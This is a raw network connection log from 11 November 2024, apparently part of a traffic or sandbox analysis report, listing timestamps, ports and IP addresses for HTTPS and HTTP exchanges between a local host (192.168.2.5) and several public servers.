Nov 11, 2024 10:33:22.433073997 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.433195114 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.433722019 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.433736086 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.433748960 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.433756113 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.434789896 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.434823990 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.434954882 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.435694933 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.435713053 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.436929941 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.437007904 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.437149048 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.437834024 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.437850952 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.437913895 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.438002110 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.438010931 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.438025951 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.438030005 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.438525915 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.438538074 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.441585064 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.441595078 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.441656113 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.442071915 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.442492962 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.442509890 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.442637920 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.442693949 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.442722082 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.442810059 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.442852020 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.443088055 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.443099022 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.443110943 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.443114996 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.443440914 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.443440914 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.443447113 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.443453074 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.446105957 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.446115971 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.446285009 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.446907043 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.446917057 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.450026035 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.450057030 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.450139999 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.450499058 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.450510025 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.457545042 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.457786083 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.457798004 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.458664894 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.458746910 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.458766937 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.459865093 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.459928036 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.460083961 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.460108042 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.460558891 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.460571051 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.461143970 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.461205959 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.462160110 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.462223053 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.462412119 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.462419987 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.468990088 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.469211102 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.469223022 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.470261097 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.470323086 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.471642971 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.471726894 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.471843004 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.471853018 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.553968906 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.554054976 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.554322958 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.554338932 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.555937052 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.555994987 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.556297064 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.556308985 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.563142061 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.565242052 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.565304041 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.565350056 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.565579891 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.565592051 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.778165102 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.779098034 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.779123068 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.779681921 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.779697895 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.779764891 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.779773951 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.779791117 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.779810905 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.780694962 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.783133030 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.783219099 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.783462048 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.783471107 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.848035097 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:22.891333103 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:22.933139086 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.952039957 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.952107906 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.952162981 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.952174902 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.952682972 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.954688072 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.954741001 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.954750061 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.956881046 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.957410097 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.959542990 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.960489035 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.962021112 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.962079048 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.962088108 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.966478109 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.966662884 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.966670990 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.972193956 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.972237110 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.972244024 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.978580952 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.978626013 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.978632927 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.983875036 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.983926058 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.983932972 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.989777088 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.989828110 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.989836931 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.013928890 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:23.017024040 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:23.017096996 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:23.017173052 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:23.022636890 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.022686005 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.022855997 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.023014069 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.023037910 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.023111105 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.023878098 CET	49794	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.023900032 CET	443	49794	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.024014950 CET	49795	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.024030924 CET	443	49795	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.032927036 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.032974958 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.032984972 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.034945011 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.034995079 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.035001993 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.040649891 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.040740967 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.040749073 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.046550035 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.046596050 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.046607971 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.052350044 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.052460909 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.052469969 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.053533077 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.053556919 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.055120945 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.055141926 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.055531979 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.055538893 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.055608988 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.055615902 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.055888891 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.055901051 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.056066990 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.056086063 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.056273937 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.056281090 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.056680918 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.056700945 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.056767941 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.056772947 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.057173967 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.057178974 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.057806015 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:23.057827950 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:23.058293104 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.058339119 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.058346987 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.061481953 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:23.061486959 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:23.061537027 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:23.061542988 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:23.061752081 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:23.061764002 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:23.064049006 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.064116955 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.064125061 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.069916964 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.071449995 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.071458101 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.075786114 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.075836897 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.075845003 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.079030037 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.079052925 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.079134941 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.079402924 CET	49796	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.079416990 CET	443	49796	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.079719067 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.079741955 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.079968929 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.080389977 CET	49797	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:23.080399036 CET	443	49797	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:23.081106901 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.081412077 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.081418991 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.084328890 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:23.086328030 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.086393118 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.086401939 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.089071035 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:23.091305971 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.091351986 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.091361046 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.096395969 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.096477985 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.096484900 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.101458073 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.101533890 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.101541042 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.106528044 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.106581926 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.106607914 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.111597061 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.111635923 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.111650944 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.111659050 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.111701965 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.116627932 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.120223999 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.120265007 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.120277882 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.120285988 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.120328903 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.123640060 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.126816034 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.126852989 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.126909971 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.126919031 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.126976967 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.130009890 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.133142948 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.133193970 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.133228064 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.133234978 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.133320093 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.136333942 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.140209913 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.140254021 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.140280008 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.140288115 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.140361071 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.145067930 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.145535946 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.149841070 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.149848938 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.149866104 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.149920940 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.149924040 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.150083065 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.152292967 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.152303934 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.152375937 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.153737068 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.153747082 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.153801918 CET	49791	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.153806925 CET	443	49791	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.154608011 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.154643059 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.154674053 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.154686928 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.154695034 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.154695034 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.154733896 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.154751062 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.154755116 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.154793024 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.156714916 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.156737089 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.156750917 CET	49788	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.156757116 CET	443	49788	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.158468008 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.158488035 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.158498049 CET	49792	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.158504009 CET	443	49792	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.159145117 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.159271955 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.159298897 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.159324884 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.159332037 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.159377098 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.163928986 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.164042950 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.164149046 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.164158106 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.165116072 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.165122032 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.165133953 CET	49790	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.165137053 CET	443	49790	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.167661905 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.167661905 CET	49789	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.167669058 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.167678118 CET	443	49789	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.168638945 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.168704987 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.168713093 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.168746948 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.168802023 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.168807983 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.173393965 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.173424959 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.173450947 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.173456907 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.173683882 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:23.176062107 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.176083088 CET	443	49798	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.176255941 CET	49798	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.177073956 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.177095890 CET	443	49799	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.177164078 CET	49799	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.178116083 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:23.178925037 CET	49800	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:23.178966999 CET	443	49800	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:23.179016113 CET	49800	443	192.168.2.5	13.107.246.45
